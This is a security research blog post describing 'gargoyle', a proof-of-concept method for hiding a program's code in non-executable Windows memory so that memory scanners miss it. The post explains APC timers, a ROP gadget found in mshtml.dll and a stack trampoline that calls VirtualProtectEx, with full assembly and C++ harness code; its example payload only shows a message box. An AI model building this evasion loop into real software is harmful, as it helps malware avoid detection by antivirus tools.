gargoyle is a technique for hiding all of a program’s executable code in non-executable memory. At some programmer-defined interval, gargoyle will wake up–and with some ROP trickery–mark itself executable and do some work:
The technique is demonstrated for 32-bit Windows here. In this post, we’ll dig through all the gritty details of how it’s implemented.
Live memory analysis
Performing live memory analysis can be a really expensive operation–if you use Windows Defender, you may have been on the business end of this problem (just Google “Antimalware Service Executable”). Since programs must reside in executable memory, a common technique for reducing computational burden is to limit analysis on executable code pages only. In many processes, this will reduce the amount of memory to analyze by an order of magnitude.
gargoyle demonstrates that this is a risky approach. Through the use of Windows Asynchronous Procedure Calls, read/write only memory can be invoked as executable memory to perform some tasks. Once it has completed running its tasks, it returns to read/write memory until a timer expires. Then the loop repeats.
Of course, there’s no InvokeNonExecutableMemoryOnTimerEx
Windows API. Getting the loop going requires some work…
Windows Asynchronous Procedure Calls (APC)
Asynchronous programming allows some task to be executed at a later date, potentially in the context of a separate thread of execution. Each thread has its own APC Queue, and when a thread is put into an alertable state, Windows will dispatch work from the APC queue to the waiting thread.
There are a bunch of ways to queue APCs:
And a bunch of ways to enter an alertable state:
- SleepEx
- SignalObjectAndWait
- MsgWaitForMultipleObjectsEx
- WaitForMultipleObjectsEx
- WaitForSingleObjectEx
The combination we’ll be employing is to create a timer with CreateWaitableTimer
and then queue APCs with SetWaitableTimer
:
HANDLE WINAPI CreateWaitableTimer(
_In_opt_ LPSECURITY_ATTRIBUTES lpTimerAttributes,
_In_ BOOL bManualReset,
_In_opt_ LPCTSTR lpTimerName
);
The default security attributes are fine, we don’t want to manually reset, and we don’t want a named timer. So all of the arguments to CreateWaitableTimer
are 0
or nullptr
. This function returns a HANDLE
to our newly minted timer. Next, we must configure it:
BOOL WINAPI SetWaitableTimer(
_In_ HANDLE hTimer,
_In_ const LARGE_INTEGER *pDueTime,
_In_ LONG lPeriod,
_In_opt_ PTIMERAPCROUTINE pfnCompletionRoutine,
_In_opt_ LPVOID lpArgToCompletionRoutine,
_In_ BOOL fResume
);
The first argument is the handle we got from CreateWaitableTimer
. The pDueTime
argument is a pointer to a LARGE_INTEGER
that specifies the time of the first timer expiry. For the example, we simply zero this out (expire immediately). The lPeriod
defines the expiration interval in milliseconds. This determines the frequency at which gargoyle is invoked.
The next argument, pfnCompletionRoutine
will be the subject of some considerable effort on our part. This is the address that Windows calls from the waiting thread. Sounds simple, except that none of gargoyle’s code is in executable memory at the time the APC is dispatched. If we were to point pfnCompletionRoutine
at gargoyle, we’d end up with a data execution prevention (DEP) violation. Weird, I know.
Instead, we use an exotic kind of ROP gadget that will reorient the stack of the executing thread to the address pointed to by lpArgToCompletionRoutine
, the next argument to SetWaitableTimer
. When the ROP gadget ret
s, the specially crafted stack helpfully calls into VirtualProtectEx
to mark gargoyle executable before tail-calling into gargoyle’s first instruction.
The last argument has to do with whether to wake up a sleeping computer when the timer expires. We set this to false
for this proof of concept.
Windows Data Execution Prevention and VirtualProtectEx
The final piece is the venerable VirtualProtectEx, which marks memory with various protection attributes:
BOOL WINAPI VirtualProtectEx(
_In_ HANDLE hProcess,
_In_ LPVOID lpAddress,
_In_ SIZE_T dwSize,
_In_ DWORD flNewProtect,
_Out_ PDWORD lpflOldProtect
);
We are going to call VirtualProtectEx
in two contexts: after gargoyle has completed executing (before we make the thread alertable) and before gargoyle starts executing (after the thread has been dispatched for APC completion). See the infographic for more details.
In this proof of concept, we keep gargoyle, the trampoline, the ROP gadget, and our read/write memory all in the same process, so the first argument hProcess
can be set equal to GetCurrentProcess. The next argument, lpAddress
, corresponds to the address of gargoyle and dwSize
corresponds to the size of gargoyle’s executable memory. We provide the desired protection attributes to flNewProtect
. We don’t care about the old protection attributes, but unfortunately lpflOldProtect
is not an optional argument. So we will point this at some empty memory we’ve set aside.
The only argument that will differ depending context is the flNewProtect
. When gargoyle goes to sleep, we want to mark it PAGE_READWRITE
or 0x04
. Before gargoyle gains execution, we want to mark it PAGE_EXECUTE_READ
or 0x20
.
The Stack Trampoline
Note: If you are not familiar with x86 calling conventions, this section will be hard to understand. See my post on x86 calling conventions for a refresher.
In the usual case, ROP gadgets are used to defeat DEP by doing a little bit of work at a time to build up a call into VirtualProtectEx
to e.g. mark the stack executable then tail call off to an address on the stack. This is often useful in exploit development, when an attacker can write to non-executable memory and needs a way to animate it. It is possible to chain some number of ROP gadgets together to do quite a bit of work.
Unfortunately, we do not have control over very much of the context of our alerted thread. We can control (a) the instruction pointer eip
via pfnCompletionRoutine
and (b) a pointer on the stack of the alerted thread at location esp+4
, i.e. the first argument to the invoked function since it is a WINAPI
/__stdcall
callback.
Fortunately, we already have full execution before the APC even gets queued, so we can carefully craft a new stack–a stack trampoline–for our alerted thread. Our strategy is to find a ROP gadget that replaces esp
to point at our stack trampoline. Anything of the following form would work:
pop * ; Some instruction that adds 4 to esp
pop esp
ret
It’s a little exotic, since functions don’t usually end with a pop esp
/ret
, but fortunately Intel x86 assembly produces very dense executable memory thanks to variable-length opcodes. Anyway, there’s one such gadget in 32-bit mshtml.dll
at offset 7165405
from base:
pop ecx
pop esp
ret
Note: Thanks to Sascha Schirra’s excellent Ropper tool.
This gadget will set esp
equal to whatever value we put into lpArgToCompletionRoutine
when we called SetWaitableTimer
. All that’s left to do now is have lpArgToCompletionRoutine
point to some carefully crafted memory that looks like a stack. This stack trampoline looks like this:
struct StackTrampoline {
void* VirtualProtectEx; // <-- ESP here; ROP gadget rets
void* return_address; // Tail-call to gargoyle
void* current_process; // First arg to VirtualProtectEx
void* address;
uint32_t size;
uint32_t protections;
void* old_protections_ptr;
uint32_t old_protections; // Last arg to VirtualProtectEx
void* setup_config; // First argument to gargoyle
};
We set lpArgToCompletionRoutine
equal to the void* VirtualProtectEx
argument so that the ROP gadget ret
s and VirtualProtectEx
gets called. When VirtualProtectEx
receives this call, esp
will be pointing at void* return_address
. We’ve conveniently set this to–you guessed it–our now-executable gargoyle, and Bob’s your uncle!
gargoyle
Let’s pause for a moment and take a look at the read/write Workspace
we set up before creating the timer and kicking off the loop. The Workspace
contains three main components: some configuration to help gargoyle bootstrap itself, stack space, and the StackTrampoline
:
struct Workspace {
SetupConfiguration config;
uint8_t stack[stack_size];
StackTrampoline tramp;
};
You’ve already seen the StackTrampoline
, and stack
is just a chunk of memory. The SetupConfiguration
looks like this:
struct SetupConfiguration {
uint32_t initialized;
void* setup_address;
uint32_t setup_length;
void* VirtualProtectEx;
void* WaitForSingleObjectEx;
void* CreateWaitableTimer;
void* SetWaitableTimer;
void* MessageBox;
void* tramp_addr;
void* sleep_handle;
uint32_t interval;
void* target;
uint8_t shadow[8];
};
Inside of the proof of concept harness in main.cpp
, the SetupConfiguration
is set up this way:
config.setup_address = setup_memory; // Address of gargoyle
config.setup_length = static_cast<uint32_t>(setup_size);
config.VirtualProtectEx = VirtualProtectEx;
config.WaitForSingleObjectEx = WaitForSingleObjectEx;
config.CreateWaitableTimer = CreateWaitableTimerW;
config.SetWaitableTimer = SetWaitableTimer;
config.MessageBox = MessageBoxA;
config.tramp_addr = &tramp; // Address of stack trampoline
config.interval = invocation_interval_ms; // e.g. 15000
config.target = gadget_memory; // Address of ROP gadget
Pretty simple. It’s basically just pointers to various Windows functions and some helpful arguments.
Now that you have an idea of what the Workspace
looks like, let’s get back to gargoyle. Once the stack trampoline has invoked VirtualProtectEx
and the tail call kicks in, gargoyle has execution. At this point, esp
is pointing at old_protections
since VirtualProtectEx
is WINAPI
/__stdcall
and will clean up after itself.
Notice we’ve put an extra argument, void* setup_config
, at the end of StackTrampoline
. This is conveniently placed as if it were the first argument to invoking gargoyle as a __cdecl
/__stdcall
function.
This allows gargoyle to find its read/write configuration in memory:
mov ebx, [esp+4] ; Configuration in ebx now
lea esp, [ebx + Configuration.trampoline - 4] ; Bottom of "stack"
mov ebp, esp
Now we’re ready to rock. esp
is pointing at Workspace.stack
. We’ve got a hold of a Configuration
object in ebx
. If this is the first time gargoyle is called, we’ll need to setup the timer. We check for this by looking up the initialized
field on Configuration
:
; If we're initialized, skip to trampoline fixup
mov edx, [ebx + Configuration.initialized]
cmp edx, 0
If gargoyle is already initialized, we jump past all the timer setup.
jne reset_trampoline
; Create the timer
push 0
push 0
push 0
mov ecx, [ebx + Configuration.CreateWaitableTimer]
call ecx
mov [ebx + Configuration.sleep_handle], eax
; Set the timer
push 0
mov ecx, [ebx + Configuration.trampoline_addr]
push ecx
mov ecx, [ebx + Configuration.gadget]
push ecx
mov ecx, [ebx + Configuration.interval]
push ecx
lea ecx, [ebx + Configuration.shadow]
push ecx
mov ecx, [ebx + Configuration.sleep_handle]
push ecx
mov ecx, [ebx + Configuration.SetWaitableTimer]
call ecx
; Set the initialized bit
mov [ebx + Configuration.initialized], dword 1
; Replace the return address on our trampoline
reset_trampoline:
mov ecx, [ebx + Configuration.VirtualProtectEx]
mov [ebx + Configuration.trampoline], ecx
Notice that at reset_trampoline
we reinstall the address of VirtualProtectEx
onto the stack trampoline. After the ROP gadget ret
s, VirtualProtectEx
executes. When it does, it will clobber its address on the stack trampoline during normal function execution.
At this point, you get to execute arbitrary code. For the proof of concept, we pop a message box:
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;; Arbitrary code goes here. Note that the
;;;; default stack is pretty small (65k).
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Pop a MessageBox as example
push 0 ; null
push 0x656c796f ; oyle
push 0x67726167 ; garg
mov ecx, esp
push 0x40 ; Info box
push ecx ; ptr to 'gargoyle' on stack
push ecx ; ptr to 'gargoyle' on stack
push 0
mov ecx, [ebx + Configuration.MessageBox]
call ecx
mov esp, ebp
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Once we’re done executing, we need to set up our tail calls to VirtualProtectEx
then WaitForSingleObjectEx
. We actually set up two calls to WaitForSingleObjectEx
, since the APC will return from the first and continue executing. This enables us to loop APCs indefinitely:
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;; Time to setup tail calls to go down
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Setup arguments for WaitForSingleObjectEx x1
push 1
push 0xFFFFFFFF
mov ecx, [ebx + Configuration.sleep_handle]
push ecx
push 0 ; Return address never ret'd
; Setup arguments for WaitForSingleObjectEx x2
push 1
push 0xFFFFFFFF
mov ecx, [ebx + Configuration.sleep_handle]
push ecx
; Tail call to WaitForSingleObjectEx
mov ecx, [ebx + Configuration.WaitForSingleObjectEx]
push ecx
; Setup arguments for VirtualProtectEx
lea ecx, [ebx + Configuration.shadow]
push ecx
push 2 ; PAGE_READONLY
mov ecx, [ebx + Configuration.setup_length]
push ecx
mov ecx, [ebx + Configuration.setup_addr]
push ecx
push dword 0xffffffff
; Tail call to WaitForSingleObjectEx
mov ecx, [ebx + Configuration.WaitForSingleObjectEx]
push ecx
; Jump to VirtualProtectEx
mov ecx, [ebx + Configuration.VirtualProtectEx]
jmp ecx
Trying it out
The source for the proof of concept is on github and you can try it out easily, but you must have the following installed:
- Visual Studio: 2015 Community is tested, but it may work for other versions.
- Netwide Assembler v2.12.02 x64 is tested, but it may work for other versions. Make sure
nasm.exe
is on your path.
Clone gargoyle:
git clone https://github.com/JLospinoso/gargoyle.git
Open Gargoyle.sln
and build.
You must run gargoyle.exe in the same directory as setup.pic
. By default, this is in Debug
or Release
, the output directories of the solution.
Every 15 seconds, gargoyle will pop up a message box. When you click ok, gargoyle completes with the VirtualProtectEx
/WaitForSingleObjectEx
tail call.
For fun, use Sysinternals’s excellent VMMap tool to examine when gargoyle’s PIC is executable. If a message box is active, gargoyle will be executable. If it is not, gargoyle should not be executable. The PIC’s address is printed to stdout
just before the harness calls into the PIC.
Feedback
Please post any issues or bugs you find!